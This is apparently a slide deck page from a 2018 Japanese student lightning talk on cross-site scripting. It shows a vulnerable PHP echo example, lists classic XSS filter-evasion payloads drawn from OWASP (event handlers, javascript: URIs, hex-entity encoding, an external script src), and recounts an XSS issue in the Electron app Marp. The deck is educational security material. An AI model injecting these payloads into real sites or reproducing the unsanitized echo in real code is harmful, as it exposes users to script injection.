XSSの入力値を調べてみた / searching xss insertion value

49116ff34041caf0476b170ab193ebc5?s=47 Tomoyuki KOYAMA
February 03, 2018
Technology
2
1k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

49116ff34041caf0476b170ab193ebc5?s=128

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
81
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
80
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
180
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
210
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
22

Other Decks in Technology

See All in Technology
F0ec1a6cb9e7be1911ed97b6561ed5ac?s=48 k1nakayama
0
130
Bf7fe621f4fe1615c228ef8a79b87282?s=48 shirayanagiryuji
2
650
E9e3472b8801ed21298ccefeecfaf429?s=48 takamichie
0
120
098ad475722e3697ec2fba28c8654f9f?s=48 yuhta28
0
370
9e7a653ed313b3da4b263a772bfc5026?s=48 clustervr
0
4k
0102ef8594b9d3a74f45dfd5daa5ede4?s=48 yskmjp
0
200
1def12864e30f8ea1a4d3bdd67cbb124?s=48 pitan
2
790
D5554c0703d71b3f813e658020267954?s=48 masudas75
1
300
8434e5fcdb11033234455d4b2bfb6bb3?s=48 voyage_tech
0
500
332f89cc697355902a817506b6995f2b?s=48 ytaka23
1
790
80a3a3857a55f154d23acb705eff72cc?s=48 star_zero
4
350
961126d9892ae4df45249529a0721571?s=48 sugamasao
2
480

Featured

See All Featured
016edace78ffe826f2348d1e0c504afd?s=48 maggiecrowley
5
310
E6c6e133e74c3b83f04d2861deaa1c20?s=48 searls
202
35k
D67fff74178013024d833b3eec6cf27f?s=48 lynnandtonic
267
16k
7653c7c449918ff6542880a8c284f5e7?s=48 jponch
101
4.8k
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
112
24k
5b9fe87ec1faa67a4599782930f45ec9?s=48 sstephenson
144
12k
C7393b7ba7ec9c8890dd77d209fbb3c9?s=48 maltzj
499
36k
9cde37f47e4a800ea081ea42de8d749a?s=48 dougneiner
119
7.7k
9952dfcd5d338f8a8e7175c8a8f65fb5?s=48 wjessup
335
16k
9128d500301ae51524e887bb680f471d?s=48 caitiem20
305
17k
282d599b414022eba5096510f675b6e2?s=48 chrislema
231
16k
9cde37f47e4a800ea081ea42de8d749a?s=48 dougneiner
55
5.3k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron